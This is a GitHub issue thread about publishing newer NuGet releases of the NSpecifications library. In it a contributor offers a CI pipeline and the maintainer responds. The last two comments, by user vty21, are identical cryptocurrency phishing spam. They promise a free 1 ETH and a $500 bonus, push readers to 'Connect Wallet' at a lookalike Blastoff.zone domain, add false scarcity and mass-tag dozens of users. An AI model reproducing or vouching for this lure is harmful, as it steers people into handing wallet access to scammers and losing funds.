### ISSUE TITLE
Nuget Updates

### ISSUE THREAD

**Issue by kyllian** [jnicolau/NSpecifications#22]
Is there a recommended workflow for consuming the updates that have been made? I see plenty of commits that have been made since that last push to the NuGet feed.

Would the maintainer be receptive to a PR with a CI pipeline that would deploy to the NuGet feed?

I'm starting a .NET 8 project, and I believe this package would serve especially well for us. I'd rather not clone it or fork it.

Please let me know if there's any small help I can provide.

**Comment by jnicolau** [comment]
Is that pipeline able to run directly from GitHub? If so then that would really help. If not I can also upload the new version to the nugget.

**Comment by kyllian** [comment]
@jnicolau #24 should be a good example for how this could look. It does run directly from GitHub.

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
artus, @paulyoung, @RatanRSur, @pmurzin, @Brianspha, @jleei, @BasharAG, @nimishgautam, @3amlab, @heinlu, @chuninator, @mocolicious, @nanaluz, @matteocrippa, @matteocng, @luifermoron, @miguelpeixe, @rossigee, @ipluser, @cheapwebmonkey, @wyhelother, @titlelevor, @WiFiUncle, @Limitinit, @gurre, @ninja0109, @secobarbital, @raulk, @codecakes, @yiwang, @ax4, @gamebusterz, @marszall87, @jnicolau, @JulienGrv, @cdctech, @SFSandra, @baahrens, @fransixles, @divyalalwani, @dArkjON, @micheldejoode, @ThomasLowenhaupt, @Solertis, @DimasInchidi, @Meeshbhoombah, @flacks, @bhupendra-bhudia, @heypoom, @orharel

**Comment by vty21** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
